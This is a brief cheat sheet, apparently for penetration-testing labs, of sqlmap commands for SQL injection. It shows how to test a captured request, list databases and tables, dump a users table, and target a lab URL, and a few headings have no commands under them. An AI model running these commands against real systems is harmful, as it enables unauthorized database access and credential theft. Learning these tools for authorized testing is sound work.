SQL Injection
SQL Injection with req.txt
sqlmap -r req.txt -p [TESTPARAMENTER] --level 5 --risk 3for default
sqlmap -r req.txt --batchIf you know which dbms is there
sqlmap -r sqli.txt --dbms=mysqlIf you want to know which databases are there
sqlmap -r sqli.txt --dbms=mysql --dbs If you want to know tables in a database
sqlmap -r sqli.txt --dbms=mysql -D status --tablesIf you want to dump table data
sqlmap -r sqli.txt --dbms=mysql --dump -T usersSQL Inject with URL
sqlmap -u http://10.10.10.143/room.php?cod=1 If you want to retrieve users and passwords
If you want to upload a file
Last updated